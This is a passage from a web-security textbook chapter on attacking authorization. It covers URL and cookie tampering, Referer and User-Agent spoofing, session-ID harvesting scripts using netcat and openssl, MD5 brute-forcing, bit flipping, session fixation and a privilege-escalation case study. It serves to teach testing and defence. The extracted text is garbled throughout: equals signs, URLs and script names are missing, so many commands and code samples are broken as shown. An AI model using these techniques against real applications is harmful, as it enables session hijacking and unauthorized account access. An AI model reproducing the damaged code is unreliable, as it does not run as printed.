to seed further ACL footprinting, as we mentioned earlier. Such “security through obscurity” usually yields to even the most trivial tampering. For example, by simply modifying the object name in the URL, a hacker can sometimes retrieve files that he would not normally be able to access. One real-world example of 178 Hacking Exposed Web Applications such a flaw occurred in March 2010 against an iPhone photo-sharing application known as Quip. Using Quip, users were able to send messages containing media, primarily photographs, to other iPhone users. Pictures and media sent with the service were assigned a randomly generated filename composed of five lowercase letters and digits (e.g., Due to insecure authorization controls on the media servers, it was found that anyone could directly access the uploaded media content by accessing the corresponding URL in any web browser. Furthermore, because filenames were generated using only a small handful of random characters and digits (this naming scheme only allows for 36 ×36 ×36 ×36 ×36 = 60,466,176 possibilities), attackers were able to brute-force the names of other legitimate media files by sending thousands upon thousands of requests. Several scripts to automate this attack were created, and thousands of private pictures and messages were compromised. Repositories of the compromised media are still hosted online today. Another real-world example of bypassing authorization via URL tampering is the Cisco IOS HTTP Authorization vulnerability. The URL of the web-based administration interface contains a two-digit number between 16 and 99: By guessing the value of NN (the two-digit number), it was possible to bypass authorization and access the device administration interface at the highest privilege level. Custom application parameter-naming conventions can also give hints about hidden directory names. For example, maybe the application profile (see Chapter 2) did not reveal any “secret” or administration directories—but you noticed that the application frequently appends “sec” to variable names (secPass) and some pages (secMenu.html). In such an application, looking for hidden folders and files that follow the same convention (i.e., “/secadmin” instead of “admin”) might be worthwhile. Common “hidden” web application resources frequently targeted by path-guessing attacks are listed in Chapter 8. ATTACKING TOKENS This section describes common attacks against web application access/session tokens. There are three basic classes of access/session token attacks: • Prediction (manual and automated) • Capture/replay • Fixation Let’s discuss each one in that order. Chapter 5: Attacking Web Authorization 179 Manual Prediction Access/session token prediction is one of the most straightforward attacks against web application authorization. It essentially involves manipulating the token in targeted ways in order to bypass access control. First, we’ll discuss manual prediction; in the next section, we’ll describe automated analysis techniques that can accelerate prediction of seemingly indecipherable tokens. Manual guessing is often effective in predicting the access token and session ID values when those values are constructed with a human-readable syntax or format. For example, in Chapter 1, you saw how simply changing the “account_type” value in Foundstone’s sample Hacme Bank web application from “Silver” to “Platinum” resulted in a privilege escalation attack. This section will describe manual tampering attacks against the following common mechanisms for tracking session state: • Query string • POST data • HTTP headers • Cookies Query String Manual Prediction As discussed in Chapter 1, the client-supplied HTTP query string may contain multiple ampersand-delimited attribute-value pairs in the URI after the question mark (?) that are passed to and processed by the application server. Access tokens and session IDs frequently appear in the query string. For example: joe&company acme The query string portion of this URI containing the user-supplied parameters to be passed to mail.aspx is mailbox=joe&company=acme. In this scenario, one obvious attack would be to change the query mailbox parameter value to that of another username (i.e., /mail.aspx?mailbox=jane&company=acme), in an attempt to view Jane’s mailbox despite being authenticated as Joe. The query string is visible in the location bar on the browser and is easily changed without any special web tools. Keep in mind that certain characters with special meaning in the URI, such as =, &, #, etc., will require URL encoding before they can be properly passed to the remote server. Use POST for Sensitive Data! Relaying the session ID in the query string is generally discouraged because it’s trivially alterable by anyone who pays attention to the address bar in his or her browser. Furthermore, unlike POST data, the URI and query string are often recorded in the client browser history, by intermediate devices processing the request such as proxies, and on remote web and application servers. This logging presents more opportunities for exposure to attackers. Unsophisticated users who are unaware of the sensitive nature of 180 Hacking Exposed Web Applications the data stored in the query string may also unknowingly expose their account to attack by sharing URIs through e-mail and public forums. Finally, it’s interesting to note that the query string is exposed in all of these scenarios even if SSL is used. Because of these issues, many web application programmers prefer to use the POST method to relay sensitive session- and authorization-related data (which carries parameter values in the body of the HTTP request where it is obscured from trivial tampering), as opposed to the GET method (which carries the data in the query string, more open to attack in the browser cache, logs, etc.). Don’t be fooled into thinking that manipulating POST data is difficult, just because the client can’t “see” it. As we illustrated clearly in Chapter 1, it’s actually quite easy. Of course, in any case, sensitive authorization data should be protected by other means than simple obscurity. However, as we’ve said elsewhere in this book, security plus obscurity can’t hurt. POST Data Manual Prediction POST data frequently contains authorization- and session-related information, since many applications need to associate any data provided by the client with the session that provided it. The following example shows how to use the cURL tool to construct a POST to a bank account application containing some interesting fields called authmask (not sure what this might be, but the fragment auth sure looks interesting), uid, and a parameter simply called a that has a value of viewacct. $ curl –v –d 'authmask 8195' –d 'uid 213987755' –d 'a viewacct' \ > --url * Connected to ( > POST / HTTP/1.1 User-Agent: curl/7.9.5 (i686-pc-cygwin) libcurl 7.9.5 (OpenSSL 0.9.6c) Host: Pragma: no-cache Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Content-Length: 38 Content-Type: application/x-www-form-urlencoded authmask 8195&uid 213987755&a viewacct The POST parameters are shown in the final line of the above text. Like the query string case, attribute-value pairs are delimited using the ampersand character and encoding of either the parameter name or value may be required if they contain special characters. One interesting thing to note in this example is how cURL automatically calculates the Content Length HTTP header, which must match the number of characters in the POST data. This field has to be recalculated if the POST payload is tampered with. Chapter 5: Attacking Web Authorization 181 “Hidden” Form Fields Another classic security-through-obscurity technique is the use of so-called hidden values within HTML forms to pass sensitive data such as session ID, product pricing, or sales tax. Although these fields are hidden from the user viewing a web site through a browser, they are, of course, still visible in the web page’s HTML source code. Attackers will often examine the actual form field tags, since the field name or HTML comments may provide additional clues to the field’s function. The WebScarab tool discussed in Chapter 1 provides a nifty “reveal hidden fields” feature that makes them just appear in the normal browser session. Let’s take a look at part of an HTML form extracted from an application’s login page to see how it might be exploited in an authorization attack:
User Name: Password: When the user submits her username and password, she is actually submitting seven pieces of information to the server, even though only two were visible on the web page. Table 5-6 summarizes these values. From this example, it appears that the U hidden field may be tracking session state information, but at this point, it’s not clear as to whether a vulnerability exists. Check out our discussion of automated session ID prediction later in this chapter for ideas on how to analyze unknown values. HTTP Header Manual Prediction HTTP headers are passed as part of the HTTP protocol itself and are sometimes used to pass authorization/session data. Cookies are perhaps the most well-known HTTP header, and they are commonly used for authorization and session state–tracking. Some applications will also make (rather insecurely) authz decisions based on the value of HTTP Referer: and other headers (and don’t worry, we’ll deal with the misspelling of Referer momentarily). The application might also rely on custom headers to track a particular user attribute. User-Agent One of the simplest authorization tests to overcome is that of a check against the client browser make and model, which is typically implemented via the User Agent 182 Hacking Exposed Web Applications Value Tries I8N Bypass U Description Probably represents the number of times the user has tried to log into the application. It’s NULL right now since we haven’t submitted a password yet. The server might lock the account if this value passes a certain threshold. The value for this field is set to us. Since it appears to handle the language for the site, changing this value might not have any security implications for a session. Here’s a field name that sounds exciting. Does bypass require a specific string? Or could it be a Boolean value that lets a user log in without requiring a password? An unknown field. This could contain a session identifier or application information. Challenge This string could be part of a challenge-response authentication mechanism. Login Passwd The user’s login name. The user’s password. Table 5-6 Examples of Hidden Form Field Values Potential Vulnerability Since the lockout variable is carried on the client side, it can be trivially modified to prevent lockout during a passwordguessing attack (say, by holding it at 0), or to lock out arbitrary users creating a DoS condition. The field could still be vulnerable to input validation attacks. Check out Chapter 6 for more information. This bypasses the login page as an authorization attack. May contain sensitive session data that has been encoded (easy to break) or encrypted (usually difficult to break). Tampering will probably invalidate authentication, but you never know. Also may be vulnerable to input validation attack. SQL injection attacks might be interesting here (see Chapter 6). SQL injection attacks might be interesting here as well. Chapter 5: Attacking Web Authorization 183 HTTP header. Many tools, cURL included, enable the user to specify an arbitrary User Agent header, so this check is really meaningless as an authorization mechanism. For example, if an application requires Internet Explorer for political reasons as opposed to technical ones (such as requiring a particular ActiveX component), you can change the User Agent header to impersonate IE: $ curl –-user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" \ > --url While not terribly common, if this vulnerability does occur in the wild, it is likely to appear in applications that do not rely on standard web browsers such as IE and Firefox, but rather on a custom implementation of an HTTP client that sends a special User Agent value. If the remote application server processing the requests is insecurely implemented to trust any request specifying that special User Agent value, then a malicious user may possibly be able to bypass authz and access sensitive data and resources. Cookies Cookie values may be the most common location for storing authorization and state information. They are set using the HTTP Set Cookie header, as shown in the following example: Set-Cookie: NAME VALUE; expires DATE; path PATH; domain DOMAIN NAME; secure Once set, the client simply replays the cookie back to the server using the Cookie header, which looks almost exactly like the Set Cookie header, minus the extraneous attributes domain, path, and secure. Since cookies are so commonly used for authorization, we’ll discuss them on their own shortly in an upcoming section of this chapter. Referer A common mistake web application developers often make is to trust information included as part of the Referer header and utilize that as a form of authentication. Well, what does the Referer header do? Why is it a security mistake? And for that matter, why is it misspelled? The Referer header is very simple. Basically, it tells the server the URI of the resource from which the URI in the request was obtained (i.e., “where I’m coming from”). They are automatically added by your browser when you click links, but not included if you type in the URI yourself. For example, if you were on Site A, and clicked a link to go to Site B, the Referer header would contain the URI of Site A as part of the HTTP request header, like so: Referer: Why is it a mistake to rely on Referer headers for authorization? As it is commonly implemented in web applications, each time a new area is accessed by following a link, 184 Hacking Exposed Web Applications a piece of custom code on the server checks the Referer header. If the URL included in the Referer header is “expected,” then the request is granted. If it is not, then the request is denied, and the user is shunted to some other area, normally an error page or something similar. We can see how this process works in the following code sample. It’s a simple Referer header authentication protocol included as part of an .asp page. strReferer Request.ServerVariables("HTTP REFERER") If strReferer "" Then ' this page is called from login..htm! ' Run functionality here End If In this case, the code only looks for an expected URL, .html. If that is present, the request is granted. Otherwise, it is denied. Why would a developer use a URL included as part of a Referer header for authentication? Primarily, as a shortcut. It relies on the assumption that users who accessed a specific application page can be treated as properly authenticated. That has some obvious, negative realworld implications. Say, for instance, that a site contains an Administrative area that relies on the Referer header value for authentication and authorization. Once the user has accessed a specific page, such as the menu page, then each additional page in that area is accessible. The important thing to recognize is that the Referer value is controlled by the client and, therefore, the server cannot rely on it to make security-related decisions. The Referer value is easily spoofed using a variety of methods. The following Perl script shows one way to spoof the Referer value: use HTTP::Request::Common qw(POST GET); use LWP::UserAgent; $ua LWP::UserAgent->new(); $req POST ' '; $req->header(Referer > ' '); $res $ua->request($req); In this example, the code sets the Referer value to make it appear as if the request originated from adminmenu.html, when in it obviously did not. It should be clear from this example that setting the Referer header to an arbitrary value is a trivial operation. As the old security adage goes, it is never a good idea to base security on the name of something, as that information can easily be impersonated, replayed, or even guessed. A related security principle is also pertinent here: never trust client input. And the misspelling? It harkens back to the early days of the Internet when there was an “anything goes” mentality, and the misspelling fell through the cracks long enough to become standardized. It’s just been carried forward until now. That should tell you everything you need to know about utilizing HTTP Referer headers for authentication! Chapter 5: Attacking Web Authorization 185 Manually Predicting Cookies As we noted earlier, cookies remain the most popular form of authorization/session management within web applications despite a somewhat checkered security history (because of their central role, malicious hackers have devised numerous ways to capture, hijack, steal, manipulate, or otherwise abuse cookies over the years). However, the long history of security attacks targeting cookies is not indicative of a design problem with cookies in particular, but rather evidence of just how important these little bits of data are to authentication, authorization, and state management in application servers. Readers interested in learning more about how cookies are used to manage state in web applications are encouraged to review RFC 2109 (see the “References & Further Reading” section at the end of this chapter for links to this and other references on cookies). As we noted in the earlier section in this chapter on HTTP headers, cookies are managed using the Set-Cookie and Cookie HTTP headers. Cookies are commonly used to store almost any data, and all of the fields can be easily modified using HTTP analysis tools like those outlined in Chapter 1. When performing real-world assessments, we prefer using the Burp web proxy’s raw request editor functionality. Modifying the cookie value is possible when intercepting requests and responses, or when replaying requests in the repeater pane. Figure 5-3 shows the cookie values set by an application. Figure 5-4 shows how to use Burp to change a cookie’s value in the repeater pane. Figure 5-3 Using Burp to examine cookie values set in response 186 Hacking Exposed Web Applications Figure 5-4 Editing a cookie value with Burp How are cookies commonly abused to defeat authorization? Here’s an example of an application that uses a cookie to implement “remember me”–type functionality for authorization/state-tracking: Set-Cookie: autolog bWlrZTpteXMzY3IzdA%3D%3D; expires Sat, 01-Jan-2037 00:00:00 GMT; path /; domain Despite the somewhat cryptic content of this cookie, even an unsophisticated attacker could simply copy the cookie value and replay it to impersonate the corresponding user. Astute readers may notice the last four characters of the autolog cookie value are the URL-encoded value %3D%3D. Decoded, this value is == (two back-to-back equals characters), and this combination of characters appended to the end of gibberish values such as the one shown for the autolog cookie almost always indicates the use of Base64 encoding. Decoding the Base64 cookie reveals the ASCII string mike:mys3cr3t, which is clearly the username and password of the corresponding user. Finally, both the secure and HTTPOnly flags are not set for this cookie. When the secure flag is not set, the browser will send the cookie value over unencrypted channels (any normal HTTP connection, as opposed to HTTPS). The HTTPOnly flag is used to prevent malicious JavaScript from accessing the value of the cookie and exfiltrating it to an attackercontrolled system. Bypassing Cookie Expire Times When you log out of an application that uses cookies, the usual behavior is to set the cookie value to NULL (i.e., Set Cookie: foobar=) with an expire time in the past. This effectively erases the cookie. An application might also use the expire time to force users to re-authenticate every 20 minutes. The cookie would only have a valid period of 20 minutes from when the user first authenticated, and when that 20 minutes has elapsed, the client browser will delete it. Because subsequent requests Chapter 5: Attacking Web Authorization 187 will no longer contain the deleted authorization/session cookie, the server will redirect the client to an authentication page. This can be an effective way to time-out unused sessions automatically, although, like any security sensitive functionality, it requires careful implementation. For example, if the application sets a “has password” value that expires in 20 minutes, then an attacker might attempt to extend the expire time and see if the server still honors the cookie (note the bolded text, where we’ve changed the date one year into the future): Set-Cookie: HasPwd 45lfhj28fmnw; expires Tue, 17-Apr-2010 12:20:00 GMT; path /; domain Set-Cookie: HasPwd 45lfhj28fmnw; expires Tue, 17-Apr-2011 12:20:00 GMT; path /; domain From this, the attacker might determine if there are any server-side controls on session times. If this new cookie, valid for 20 minutes plus one year, lasts for an hour, then the attacker knows that the 20-minute window is arbitrary—the server is enforcing a hard timeout of 60 minutes. Automated Prediction If an access token or session ID doesn’t yield to human intuition, automated analysis can be used to assist in identifying potential security vulnerabilities This section covers techniques for automated analysis of predictable session IDs and cryptographically protected values. Collecting Samples When analyzing the security and true randomness of server-issued session IDs, it is necessary to first collect a large enough sample of session IDs in order to perform a meaningful statistical analysis. You’ll want to do this with a script or other automated tool (the Burp sequencer tool is great for this purpose) since collecting 10,000 values manually quickly becomes monotonous! Here are three example Perl scripts to help you get started. You’ll need to customize each one to collect a particular variable (we’ve grep’ed for some COTS session IDs in these examples just for illustration purposes). The following script,, collects ASPSESSIONID values from an HTTP server using netcat: #!/bin/sh # while [ 1 ] do echo -e "GET / HTTP/1.0\n\n" | \ nc -vv $1 80 | \ grep ASPSESSIONID done 188 Hacking Exposed Web Applications The next script,, collects JSESSIONID values from an HTTPS server using the openssl client: #!/bin/sh # gather while [ 1 ] do echo -e "GET / HTTP/1.0\n\n" | \ openssl s client -quiet -no tls1 -connect $1:443 2>/dev/null | \ grep JSESSIONID done Finally, the script collects JSESSIONID values from an HTTPS server using the openssl client, but also POSTs a specific login request that the server requires before setting a cookie: #!/bin/sh # gather while [ 1 ] do cat nudge \ openssl s client -quiet -no tls1 -connect $1:443 2>/dev/null | \ grep JSESSIONID done The contents of the “nudge” file referenced in this script are as follows: POST /secure/client.asp?id 9898 HTTP/1.1 Accept: */* Content-Type: text/xml Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461) Host: Content-Length: 102 Connection: Keep-Alive Cache-Control: no-cache latourEiffel Each one of the scripts runs in an infinite loop. Make sure to redirect the output to a file so you can save the work. For example: $ ./ | tee cookies.txt $ ./gather | tee cookies.txt $ ./gather | tee cookies.txt Chapter 5: Attacking Web Authorization 189 Use the GNU cut command along with grep to parse the actual value from the cookies.txt. Nonlinear Analysis How can you test the actual randomness of a collection of session IDs? In April 2001, Michal Zalewski of the Bindview team applied nonlinear analysis techniques to the initial sequence numbers (ISN) of TCP connections and made some interesting observations on the “randomness” of the values. The most illustrative part of the paper was the graphical representation of the analysis. Figures 5-5 and 5-6 show the visual difference in the relative random nature of two sources. Figure 5-5 Decently randomized ISN values 190 Hacking Exposed Web Applications Figure 5-6 Poorly randomized ISN values The ISN is supposed to be a random number used for every new TCP connection, much like the session ID generated by a web server. The functions used to generate the graphs do not require any complicated algorithm. Each coordinate is defined by: x[t] y[t] z[t] seq[t] - seq[t-1] seq[t-1] - seq[t-2] seq[t-2] - seq[t-3] The random values selected from the dataset are the seq array; t is the index of the array. Try applying this technique to session values you collect from an application. It is actually trivial to generate the dataset. The following Perl script accepts a sequence of numbers, calculates each point, and (for our purposes) outputs x, y, and z: #!/usr/bin/perl # @seq (); Chapter 5: Attacking Web Authorization 191 @x @y @z (); while(<>) { chomp($val $ ); push(@seq, $val); } for ($i 3; $i < $#seq; $i++) { push(@x, $seq[$i] - $seq[$i - 1]); push(@y, $seq[$i - 1] - $seq[$i - 2]); push(@z, $seq[$i - 2] - $seq[$i - 3]); } for ($i 0; $i < $#seq; $i++) { print $x[$i] . " " . $y[$i] . " " . $z[$i] . "\n"; } This function does not predict values; it only hints at how difficult it would be to predict a value. Poor session generators have significant trends that can be exploited. To use this script, we would collect session numbers in a file called session.raw, and then pipe the numbers through the Perl script and output the results to a data file called 3d.dat: $ cat session.raw | ./ > 3d.dat The 3d.dat file contains an X, Y, and Z coordinate on each line. Gnuplot can then be used to produce a graphical representation of the results. Remember, while this procedure does not predict session ID values, it is very useful for determining how hard it would be to predict values. Users of the Burp web proxy may be familiar with the sequencer tab and built-in randomness statistical analysis tool. The sequencer utility not only simplifies collection of tokens, but also retrieves them from anywhere in the server response, and the mathematical analysis of the randomness is performed automatically as the tokens are retrieved. Populating the sequencer tool with a request/response pair is as simple as right-clicking on any response in Burp and selecting Send To Sequencer. The next step is to define the boundaries of the token in the response using either unique textual delimiters or static byte counts. Once the token boundary has been properly defined, the collection of tokens and automated analysis can begin. Interested readers should refer to the Burp project main web site (a link is provided in the “References & Further Reading” section at the end of this chapter). Brute-force/Dictionary Attacks In the earlier section on fingerprinting, we noted some key characteristics of MD5 hashes. If you are sure that you’ve found an MD5 hash in an application session cookie, you could use classic brute-force guessing to determine the original cleartext value (note that while this section focuses on MD5, the information applies to any hashing algorithm). 192 Hacking Exposed Web Applications For example, the following Perl commands using the Digest::MD5 module take different combinations of the login credentials and generate the corresponding MD5 hash values: $ perl -e 'use Digest::MD5; \ > print Digest::MD5::md5 base64("userpasswd")' ZBzxQ5hVyDnyCZPUM89n+g $ perl -e 'use Digest::MD5; \ > print Digest::MD5::md5 base64("passwduser")' seV1fBcI3Zz2rORI1wiHkQ $ perl -e 'use Digest::MD5; \ > print Digest::MD5::md5 base64("passwdsalt")' PGXfdI2wvL2fNopFweHnyA If the session token matches any of these values, then you’ve figured out how it’s generated. Although this example illustrates how this process would be manually performed, a simple script to automate test value generation and comparison with a target value is trivial to develop. Sites that use MD5 and other hashing algorithms often insert random data or other dynamically generated values in order to defeat brute-force guessing attacks like this. For example, a more secure way of generating the token, especially if it is based on a user password, involves concatenating the password with another piece of secret data (commonly referred to as a salt) and a timestamp: MD5( epoch time + secret + password ) Placing the most dynamic data at the beginning causes MD5 to “avalanche” more quickly. The avalanche effect means that two seed values that only differ by a few bits will produce two hash values that differ greatly. The advantage is that a malicious user only has one of the three pieces of the seed value. It wouldn’t be too hard to find the right value for the epoch time (it may only be one of 100 possible values), but the server’s secret would be difficult to guess. A brute-force attack could be launched, but a successful attack would be difficult given a properly chosen secret value. A “less” secure (“more” and “less” are ill-defined terms in cryptography) but equally viable method would be to use only the server’s secret and user password: MD5( secret + password ) In this case, an attacker would only need to guess the server’s secret value to crack the method by which the target session/authorization token is generated. If the secret contains few characters, is a commonly used password, dictionary word, or phrase, then a successful attack is conceivable. This same approach to analyzing and figuring out how session/authorization token values are generated can be applied to encrypted values as well. Chapter 5: Attacking Web Authorization 193 Bit Flipping The attacker may be able to gain a leg up by noticing trends across a collection of encrypted values. For example, you might collect a series of session tokens that only differ in certain parts: 46Vw8VtZCAvfqpSY3FOtMGbhI 4mHDFHDtyAvfqpSY3FOtMGbjV 4tqnoriSDAvfqpSY3FOtMGbgV 4zD8AEYhcAvfqpSY3FOtMGbm3 Each of these values begins with the number 4. If these are encrypted values, the leading digit 4 is probably not part of what has been encrypted. There are eight random bytes after the 4, then fourteen bytes that do not change, followed by a final two random bytes. If this is an encrypted string, then we could make some educated guesses about its content. We’ll assume it’s encrypted with Triple-DES, since DES is known to be weak: String digit + 3DES(nonce) + 3DES(username (+ flags)) + 3DES(counter ) 4 8 bytes 14 bytes 2 bytes Here’s why we make the assumption: • The field of eight characters always changes. The values are encrypted, so we have no way of knowing if they increment, decrement, or are truly random. Anyway, the source must be changing so we’ll refer to it as a nonce. • The fourteen bytes remain constant. This means the encrypted data come from a static source, perhaps the username, or first name, or a flag set for “e-mail me a reminder.” • The final two bytes are unknown. The data is short, so we could guess that it’s only a counter or some similar value that changes but does not represent a lot of information. It could also be a checksum for the previous data, added to ensure no one tampers with the cookie. Using this information, an attacker could perform “bit flipping” attacks: blindly change portions of the encrypted string and monitor changes in the application’s performance. Let’s take a look at an example cookie and three modifications: Original: 4zD8AEYhcAvfqpSY3FOtMGbm3 Modification 1: 4zD8AEYhcAAAAAAAAAAAAAAm3 Modification 2: 4zD8AEYhcBvfqpSY3FOtMGbm3 Modification 3: 4zD8AEYhcAvfqpSYAvfqpSYm3 We’re focusing the attack on the static, 14-byte field. First, we try all similar characters. If the cookie is accepted on a login page, for example, then we know that the server does not inspect that portion of the data for authentication credentials. If the cookie is rejected 194 Hacking Exposed Web Applications on the page for viewing the user’s profile, then we can guess that portion contains some user information. In the second case, we change one letter. Now we’ll have to submit the cookie to different portions of the application to see where it is accepted and where it is rejected. Maybe it represents a flag for users and superusers? You never know. (But you’d be extremely lucky!) In the third case, we repeated the first half of the string. Maybe the format is username:password. If we make this change, guessing that the outcome is username:username, and the login page rejects it, maybe we’re on the right track. This can quickly become long, unending guesswork. For tools to help with encryption and decryption, try the UNIX crypt() function, Perl’s Crypt::DES module, and the mcrypt library ( Capture/Replay As you can see, prediction attacks are usually all-or-none propositions: either the application developer has made some error, and the token easily falls prey to intuitive guessing and/or moderate automated analysis; or it remains indecipherable to the attacker and he has to move on to different attack methods. One way for the attacker to bypass all of the complexity of analyzing tokens is to simply replay another user’s token to the application. If successful, the attacker effectively becomes that user. Such capture/replay attacks differ from prediction in one key way: rather than guessing or reverse engineering a legitimate token, the attacker must acquire one through some other means. There are a few classic ways to do this, including eavesdropping, man-in-the-middle, and social engineering. Eavesdropping is an omnipresent threat to any network-based application. Popular, free network monitoring tools like Wireshark (formerly known as Ethereal) and Ettercap can sniff raw network traffic to acquire web application sessions off the wire, exposing any authorization data to disclosure and replay. The same effect can be achieved by placing a “man-in-the-middle” between the legitimate client and the application. For example, if an attacker compromises a proxy server at an ISP, the attacker would then access session IDs for all of the customers who used the proxy. Such an attack could even result in the compromise of what would normally be encrypted sessions if the proxy is responsible for HTTPS connections or an attacker successfully tricks a remote user into accepting an invalid SSL certificate. Finally, a simple but oftentimes effective method of obtaining valid session IDs is to simply ask a prospective victim for it. As we noted in our earlier discussion of sensitive data in the query string, unsophisticated users can be deceived into sending URIs via e-mail containing such data…yet another reminder of the dangers of storing sensitive data in the query string! Chapter 5: Attacking Web Authorization 195 Session Fixation In December 2002, ACROS Security published a paper on session fixation, the name they gave to a class of attacks where the attacker chooses the session ID for the victim, rather than having to guess or capture it by other means (see “References & Further Reading” for a link). Session fixation works as follows: 1. The attacker logs into a vulnerable application, establishing a valid session ID that will be used to “trap” the victim. 2. He then convinces his victim to log into the same application, using the same session ID (the ACROS paper discusses numerous ways to accomplish this, but the simplest scenario is to simply e-mail the victim a link to the application with the trap session ID in the query string). 3. Once the victim logs into the application, the attacker then replays the same session ID, effectively hijacking the victim’s session (one could say that the victim logged onto the attacker’s session). Session fixation seems like an attacker’s dream come true, but a couple of aspects to this attack make it much less appealing than initially advertised: • The attacker must convince the victim to launch a URI that logs them into the application using the “trap” session ID. Although, if you can trick someone into loading a URI, there are probably worse things you could do to them than fix a session ID. • The attacker must then log into the application using the same trap session ID, before the victim logs out or the session expires (of course, if the web app doesn’t handle stale sessions appropriately, this could be an open-ended window). Session Fixation Countermeasures There’s also a really easy countermeasure to session fixation attacks: generate new session IDs for each successful login (i.e., after authentication), and only allow the server to choose session ID values. Finally, ensure that sessions are timed out using server-side logic and that absolute session expiry limits are set. While session fixation vulnerabilities used to appear commonly in web applications (and even in some popular web application frameworks), this vulnerability class has largely gone the way of the Dodo due to the fact that developers have delegated most session generation and management to web application servers. However, even mature frameworks sometimes get it wrong or reintroduce vulnerabilities. Of course, during a security review, custom session generation and management functionality should be examined for this and other session-related vulnerabilities. Each of these countermeasures is purely application-level; the web platform is not going to protect you from session fixation. 196 Hacking Exposed Web Applications AUTHORIZATION ATTACK CASE STUDIES Now that you have gotten the basic techniques of attacking web application authorization and session management, let’s walk through some real-world examples from the authors’ consulting work that illustrate how to stitch the various techniques together to identify and exploit authorization vulnerabilities. Many of the harebrained schemes we’ll recount next are becoming less and less common as overall security awareness has improved and the use of mature authorization/ session management frameworks like ASP.NET and J2EE has grown. Nevertheless, it’s astounding how many applications today still suffer from attacks similar to the ones we’ll discuss in the following sections. Obviously, the names and exact technical details in this chapter have been changed to protect the confidentiality of the relevant parties. Horizontal Privilege Escalation Horizontal privilege escalation is exploiting an authorization vulnerability to gain the privileges of a peer user with equal or fewer privileges within the application (contrast this with the more dangerous vertical escalation to higher privilege, which we’ll discuss in the next section). Let’s walk through the process of identifying such an authorization vulnerability using a fictitious web shopping application as an example. First, we’ll set up our browser so you can view and manipulate all input and output to the web application using any one of the HTTP analysis tools discussed in Chapter 1. Then we navigate to the site and immediately set out to identify how the site creates new accounts. This is very easy since the “set up new account” feature is available right where existing users log in (these applications are usually eager to register new shoppers!), as shown in Figure 5-7. Figure 5-7 The Set Up New Account feature is usually available right at the application login screen. Chapter 5: Attacking Web Authorization 197 Like most helpful web shopping applications, this one walks you through the account creation forms that ask for various types of personal information. We make sure to fill in all this information properly (not!). Near the very end of the process we reach a Finish or Create Account option, but we don’t click it just yet. Instead, we go to our HTTP analysis tool and clear any requests so we have a clean slate. Now it’s time to go ahead and click the button to finalize the creation of the account, which results in the screen shown in Figure 5-8. Using our analysis tool, we look carefully at the request that was sent to the server in raw HTTP format. This is the actual POST that creates the account: POST /secure/MyAcctBilling.asp HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Content-Length: 414 Cookie: 20214200UserName foo%40foo%2Ecom; 20214200FirstName Michael; BIGipServerSecure2.TEAM.WebHosting 1852316332.20480.0000; LastURL http%3A%2F%2Fwww%2Esite%2Ecom; ASPSESSIONIDQAASCCQS GKEMINACKANKBNLFJAPKNLEM stealth 1&RegType 1&UserID &Salutation Mr&FirstName Michael&LastName Holmes&EmailAddress testpassword&Password2 testpassword&DayPhone1 678&DayPhone2 555&DayPhone3 555&AltPhone1 &AltPhone2 &AltPhone3 &Address1 294+forest+break+lane&Address2 &City atlanta&State GA&Country United+States&PostalCode 30338&CCName 0&CCNum &CCExpMonth 0&CCExpYear 0000&update billing info on&submit.x 43&submit.y 13 Figure 5-8 Successful account creation 198 Hacking Exposed Web Applications And here’s the response from the server: HTTP/1.x 302 Object moved Set-Cookie: BIGipServerSecure2.TEAM.WebHosting 1852316332.20480.0000; path / Set-Cookie: UserID 2366239; path / Set-Cookie: ShopperID 193096346; path / Set-Cookie: 20214200UserName; path / Date: Wed, 12 Oct 2010 18:13:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: 1 Content-Length: 185 Content-Type: text/html Cache-Control: private As we noted earlier in this chapter, cookies usually contain authorization information that is used to identify a session, so we take brief note of the Set Cookie values in this response. They are summarized in Table 5-7. Notice that ShopperID and UserID look very promising. The cookie names rather obviously indicate a relationship to authorization and the corresponding values are numeric, which means each value is likely subject to simple manipulation attacks (next serial iteration, etc.). Now, our task is figuring out how these cookies are actually used, and whether the ShopperID and UserID tokens are actually what we think they are. To do this, we’ll need to replay these cookies to the application while targeting functionality that might result in privilege escalation if abused. As we noted earlier in this chapter, one of the most commonly abused aspects of web authorization is account management interfaces, especially self-help functionality. With this in mind, we make a beeline to the interface within this web application that allows users to view or edit their own account information. Using Hewlett Packard’s HTTP Editor (available to customers who’ve Cookie Name 20214200UserName 20214200FirstName BIGipServerSecure2.TEAM.WebHosting LastURL ShopperID ASPSESSIONIDQAASCCQS UserID Value foo%40foo%2Ecom Michael 1852316332.20480.0000 http%3A%2F%2Fwww%2Esite%2Ecom 193096346 GKEMINACKANKBNLFJAPKNLEM 2366239 Table 5-7 Cookie Information Gleaned from our Fictitious Web Shopping Application Chapter 5: Attacking Web Authorization 199 purchased their WebInspect product), we analyze the underlying HTTP of this interface while simultaneously walking through the graphical HTML interface of the application, as shown in Figure 5-9. Using this self-help functionality, we’ll run a few replay tests with the would-be authorization cookies we found earlier. Here’s how the cookies look when they’re replayed back from the client to the server in an HTTP header: Cookie: 20214200UserName foo%40foo%2Ecom; 20214200FirstName Michael; BIGipServerSecure2.TEAM.WebHosting 1852316332.20480.0000; LastURL http%3A%2F%2Fwww%2Esite%2Ecom; ShopperID 193096346; ASPSESSIONIDQAASCCQS GKEMINACKANKBNLFJAPKNLEM; UserID 2366239 Figure 5-9 Analyzing the self-help account editing interface for our fictitious web shopping application using Hewlett Packard’s HTTP Editor 200 Hacking Exposed Web Applications To check our guess that ShopperID and UserID are used to make authorization decisions, we now start individually removing each cookie and sending the request back. When we remove the UserID cookie, the server still responds with the account registration page shown in Figure 5-8. Therefore, this cookie is not important to our mission right now. We repeat the previous steps for each cookie until we eventually remove a cookie that will respond with an HTTP 302 redirect, which tells us that whatever token we removed was necessary for authorization. When we removed the ShopperID cookie, we ended up with the following response: HTTP/1.1 302 Object moved Date: Wed, 12 Oct 2010 18:36:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /secure/MyAcctLogin.asp?sid Content-Length: 149 Content-Type: text/html Set-Cookie: ASPSESSIONIDQAASCCQS OOEMINACOANKOLIIHMDAMFGF; path / Cache-control: private This tells us that the ShopperID cookie is most likely the application authorization token. With this site, we actually found that the BIGipServer cookie also resulted in failed authorization; however, because we know that BIG-IP is a web load-balancing product from F5 Networks Inc., we disregarded it. We did have to subsequently replay the BIGip token, 